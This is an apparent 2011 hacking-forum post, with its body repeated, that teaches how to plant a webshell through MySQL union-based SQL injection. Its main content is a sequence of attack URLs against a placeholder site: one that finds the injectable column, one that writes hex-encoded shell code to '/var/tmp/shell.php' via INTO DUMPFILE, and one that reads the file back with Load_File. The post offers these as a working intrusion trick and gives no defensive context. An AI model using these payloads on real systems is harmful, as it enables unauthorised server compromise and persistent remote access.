Uploading Shell Trought SQLInj 08-03-2011, 01:55 AM
#1
Uploading Shell Trought SQLInj
Okey guys we all know that SQLinj is the most popular vuln. in the world so most of you are using tools to gain access so for those who use tools plz go learn Manuel Injection than try think.
Okey as we are doing the injection we cant gain access to the admin panel or get the admin panel details but can upload shell...Letz say its a pian in the ass.
So here is a small trick i have learned over the years.
we have some site:
Code:
http://somesite.com
and here is a vuln link on mysql:
Code:
http://somesite.com/vuln.php?id=[SQLINJ]
and now we do our magic:
Code:
http://somesite.com/vuln.php?id=1337 union all select 1,2,3,4,5,6,7,8/*
we get the vuln column and what we do is next:
Code:
http://somesite.com/vuln.php?id=1337 union all select 1,2,3,4,5,0xshellcodeinhexhere,7,8 into dumpfile '/var/tmp/shell.php'/*
I always prefer to go with /var/tmp cuz have chmod 777[If you dont know what is this google it] and to desplay our shell we do this magic:
Code:
http://somesite.com/vuln.php?id=1337 union all select 1,2,3,4,5,Load_File('/var/tmp/shell.php'),7,8/*
And there you go you can now do your think with your shell.
For Shell code i prefer a small shell not like c99 or r57 or gny
Cheers...
Okey guys we all know that SQLinj is the most popular vuln. in the world so most of you are using tools to gain access so for those who use tools plz go learn Manuel Injection than try think.
Okey as we are doing the injection we cant gain access to the admin panel or get the admin panel details but can upload shell...Letz say its a pian in the ass.
So here is a small trick i have learned over the years.
we have some site:
Code:
http://somesite.com
and here is a vuln link on mysql:
Code:
http://somesite.com/vuln.php?id=[SQLINJ]
and now we do our magic:
Code:
http://somesite.com/vuln.php?id=1337 union all select 1,2,3,4,5,6,7,8/*
we get the vuln column and what we do is next:
Code:
http://somesite.com/vuln.php?id=1337 union all select 1,2,3,4,5,0xshellcodeinhexhere,7,8 into dumpfile '/var/tmp/shell.php'/*
I always prefer to go with /var/tmp cuz have chmod 777[If you dont know what is this google it] and to desplay our shell we do this magic:
Code:
http://somesite.com/vuln.php?id=1337 union all select 1,2,3,4,5,Load_File('/var/tmp/shell.php'),7,8/*
And there you go you can now do your think with your shell.
For Shell code i prefer a small shell not like c99 or r57 or gny
Cheers...
kehte hain k dill mein Allah rehta hai,
Kia ye such hai?
Chalein dill ko khol k dekhte hain
dill
d_ill
d_i_ll
d_i_l l
d__i__l l
SUBHAN Allah.
SEE MY BLOG
http://punjabhackerz.blogspot.com//forum
Kia ye such hai?
Chalein dill ko khol k dekhte hain
dill
d_ill
d_i_ll
d_i_l l
d__i__l l
SUBHAN Allah.
SEE MY BLOG
http://punjabhackerz.blogspot.com//forum


![[+]](https://sinister.li/images/modern/collapse_collapsed.png)

